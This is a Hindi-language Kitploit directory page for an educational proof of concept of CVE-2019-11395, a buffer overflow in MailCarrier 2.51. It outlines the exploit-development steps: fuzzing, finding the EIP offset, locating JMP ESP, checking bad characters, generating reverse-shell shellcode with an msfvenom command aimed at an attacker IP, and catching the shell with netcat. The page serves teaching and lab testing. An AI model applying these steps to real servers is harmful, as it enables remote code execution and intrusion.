Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-11395 — शैक्षणिक उद्देश्य के साथ प्रमाण की अवधारणा जो CVE-2019-11395 को पृष्ठभूमि के रूप में उपयोग करके बफर ओवरफ्लो भेद्यता को समझने के लिए है | Kitploit
उपकरण/GitHubGitHub/rafaelbicas/cve-2019-11395
पेलोड जनरेशनभेद्यता विश्लेषणशोषणशेलकोडफज़िंगलर्निंग और शिक्षाबाइनरी शोषण
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

शैक्षणिक उद्देश्य के साथ प्रमाण की अवधारणा जो CVE-2019-11395 को पृष्ठभूमि के रूप में उपयोग करके बफर ओवरफ्लो भेद्यता को समझने के लिए है

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-11395

अवलोकन

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) MailCarrier 2.51 में एक बफर ओवरफ्लो कमजोरी को प्रदर्शित करता है, जो दूरस्थ हमलावरों को एक लंबी स्ट्रिंग के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देता है। इस कमजोरी का शोषण निम्नलिखित प्रक्रियाओं का उपयोग करके किया जा सकता है:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

यह परियोजना बफर ओवरफ्लो कैसे काम करता है, इसे समझने के लिए एक शैक्षणिक दृष्टिकोण प्रदान करने का लक्ष्य रखती है।


⚠️ चेतावनी

किसी भी परीक्षण को चलाने से पहले, प्रारंभिक प्रयोग के लिए अपने उत्पादन वातावरण का कभी उपयोग न करें। इसके बजाय, अपने उत्पादन वातावरण के समान एक प्रयोगशाला सेटअप बनाएं ताकि किसी भी समस्या या अनपेक्षित परिणामों से बचा जा सके।


🔧 तैयारी

1. कमजोरी का पता लगाएं

  • एप्लिकेशन को तोड़ने के लिए आवश्यक बाइट्स की अनुमानित संख्या निर्धारित करने के लिए फज़िंग तकनीक का उपयोग करें।

2. ऑफ़सेट खोजें

  • एक बार क्रैश होने पर, इसका उपयोग करें:
    root@kitploit:~
    msf-pattern_create -l <number_of_bytes>
    

यह ऑफ़सेट निर्धारित करने में मदद करता है, जो EIP को ओवरराइट करने के लिए आवश्यक सटीक बाइट्स की संख्या है।

  • ऑफ़सेट की पुष्टि करने के लिए निम्नलिखित कमांड का उपयोग करें
    root@kitploit:~
    msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
    

यह EIP को नियंत्रित करने के लिए आवश्यक सटीक बाइट गिनती की पहचान करता है।

3. JMP या CALL निर्देश खोजें

  • इसका उपयोग करके एक निर्देश खोजें:
    root@kitploit:~
    JMP ESP
    CALL ESP
    

हम निष्पादन को पुनर्निर्देशित करने के लिए इस पते का उपयोग करेंगे। ASLR, SafeSEH या अन्य सुरक्षा तंत्रों से सावधान रहें।

4. बैड कैरेक्टर्स की पहचान करें

  • बैड कैरेक्टर्स की जांच के लिए Immunity Debugger में Mona टूल का उपयोग करें।

5. शेलकोड बनाएं

  • बैड कैरेक्टर्स को छोड़कर शेलकोड बनाएं:
    root@kitploit:~
    msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
    

6. NOPs जोड़ें

  • स्थिरता में सुधार के लिए पेलोड में NOP (\x90) निर्देश डालें।

7. कनेक्शन स्थापित करें

  • रिवर्स शेल बनाने और लक्ष्य से कनेक्ट करने के लिए netcat (nc) का उपयोग करें।
टूल डाउनलोड करें